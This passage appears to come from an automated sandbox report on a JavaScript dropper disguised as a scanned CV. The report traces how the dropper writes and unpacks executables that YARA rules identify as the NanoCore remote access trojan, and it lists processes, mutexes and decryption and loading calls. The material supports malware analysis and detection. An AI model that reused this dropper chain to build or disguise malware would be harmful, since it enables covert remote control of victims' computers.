        Source: 3.2.czkdqe.exe.264bb20.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.264bb20.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.264bb20.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.264bb20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 616
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_00406D5F1_2_00406D5F
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040CCEA2_2_0040CCEA
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040DA1A2_2_0040DA1A
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040D23B2_2_0040D23B
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040EEC02_2_0040EEC0
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040C7992_2_0040C799
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_00590F9C2_2_00590F9C
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_005912542_2_00591254
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_0040CBD13_2_0040CBD1
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_00A6E4803_2_00A6E480
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_00A6E47C3_2_00A6E47C
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: String function: 00401EE0 appears 33 times
        Source: SCAN COPY CV 310123.jsInitial sample: Strings found which are bigger than 50
        Source: SCAN COPY CV 310123.jsReversingLabs: Detection: 46%
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SCAN COPY CV 310123.js"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vtvt.exe "C:\Users\user\AppData\Roaming\vtvt.exe"
        Source: C:\Users\user\AppData\Roaming\vtvt.exeProcess created: C:\Users\user\AppData\Local\Temp\czkdqe.exe "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess created: C:\Users\user\AppData\Local\Temp\czkdqe.exe C:\Users\user\AppData\Local\Temp\czkdqe.exe
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess created: C:\Users\user\AppData\Local\Temp\czkdqe.exe "C:\Users\user\AppData\Local\Temp\czkdqe.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe "C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe" "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 616
        Source: C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 656
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe "C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe" "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\
        Source: C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 628
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vtvt.exe "C:\Users\user\AppData\Roaming\vtvt.exe" Jump to behavior
        Source: C:\Users\user\AppData\Roaming\vtvt.exeProcess created: C:\Users\user\AppData\Local\Temp\czkdqe.exe "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.cJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess created: C:\Users\user\AppData\Local\Temp\czkdqe.exe C:\Users\user\AppData\Local\Temp\czkdqe.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\vtvt.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\vtvt.exeFile created: C:\Users\user\AppData\Local\Temp\nsg14BC.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winJS@13/22@0/0
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404AB5
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2160
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4936
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1372
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{82fe3011-00e2-4a52-9361-cad1a21dd84e}
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,3_2_0040147B
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: GetTickCount2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: Kernel32.dll2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: Kernel32.dll2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: Sleep2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: Kernel32.dll2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: VirtualAlloc2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: Kernel32.dll2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: Notepad2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: Notepad2_2_00402571
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCommand line argument: Notepad2_2_00402571
        Source: 3.2.czkdqe.exe.4920000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.2.czkdqe.exe.4920000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 3.2.czkdqe.exe.4920000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Binary string: C:\xampp\htdocs\461bf42fac7a4a3490fbb99afbf96035\Loader\Release\Loader.pdb source: vtvt.exe, 00000001.00000002.337727248.000000000288B000.00000004.00000020.00020000.00000000.sdmp, vtvt.exe, 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmp, czkdqe.exe, 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmp, czkdqe.exe, 00000002.00000002.333726031.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, czkdqe.exe, 00000002.00000000.320751259.0000000000410000.00000002.00000001.01000000.00000007.sdmp, czkdqe.exe, 00000003.00000000.323642600.0000000000410000.00000002.00000001.01000000.00000007.sdmp, czkdqe.exe, 00000008.00000000.340427652.0000000000410000.00000002.00000001.01000000.00000007.sdmp, czkdqe.exe, 00000008.00000002.358024997.0000000000410000.00000002.00000001.01000000.00000007.sdmp, vktp.exe, 0000000A.00000000.342875456.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, vktp.exe, 0000000A.00000002.358495573.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, vktp.exe, 00000010.00000000.360882520.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, vktp.exe, 00000010.00000002.367294626.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, vktp.exe.2.dr, czkdqe.exe.1.dr, nsg14BD.tmp.1.dr
        Source: Binary string: wntdll.pdbUGP source: czkdqe.exe, 00000002.00000003.328982174.000000001A3D0000.00000004.00001000.00020000.00000000.sdmp, czkdqe.exe, 00000002.00000003.328542810.000000001A510000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: czkdqe.exe, 00000002.00000003.328982174.000000001A3D0000.00000004.00001000.00020000.00000000.sdmp, czkdqe.exe, 00000002.00000003.328542810.000000001A510000.00000004.00001000.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:59 o:Windows%20Script%20Host f:CreateObject r:");_Stream.Type("1");_Stream._00000000();ITextStream.WriteLine(" entry:72 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:72 o: f:Open r:undefined");IXMLDOMElement.nodeTypedValue();_Stream._00000000();ITextStream.WriteLine(" entry:78 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:78 o: f:Write r:undefined");IHost.Name();ITextStream.WriteLine(" entry:86 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:86 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:93 o: f:ExpandEnvironmentStrings a0:%22%25temp%25%22");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3._00000000();ITextStream.WriteLine(" exit:93 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:100 o: f:ExpandEnvironmentStrings a0:%22%25appdata%25%22");IWshShell3.ExpandEnvironmentStrings("%appdata%");IWshShell3._00000000();ITextStream.WriteLine(" exit:100 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");_Stream._00000000();ITextStream.WriteLine(" entry:138 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\vtvt.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:138 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:147 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe%22 f:endsWith a0:%22.jar%22");ITextStream.WriteLine(" exec:10 f:");ITextStream.WriteLine(" entry:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe f:substr a0:35");ITextStream.WriteLine(" exit:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe f:substr r:%22.exe%22");ITextStream.WriteLine(" exit:147 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe%22 f:endsWith r:false");ITextStream.WriteLine(" entry:169 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe%22 f:endsWith a0:%22.vbs%22");ITextStream.WriteLine(" exec:10 f:");ITextStream.WriteLine(" entry:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe f:substr a0:35");ITextStream.WriteLine(" exit:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe f:substr r:%22.exe%22");ITextStream.WriteLine(" exit:169 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe%22 f:endsWith r:false");ITextStream.WriteLine(" entry:174 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe%22 f:endsWith a0:%22.wsf%22");ITextStream.WriteLine(" exec:10 f:");ITextStream.WriteLine(" entry:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5Cvtvt.exe f:substr a0:35");ITextStream.WriteLine(" exit:14 o:
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeUnpacked PE file: 3.2.czkdqe.exe.4920000.9.unpack
        Source: 3.2.czkdqe.exe.4920000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
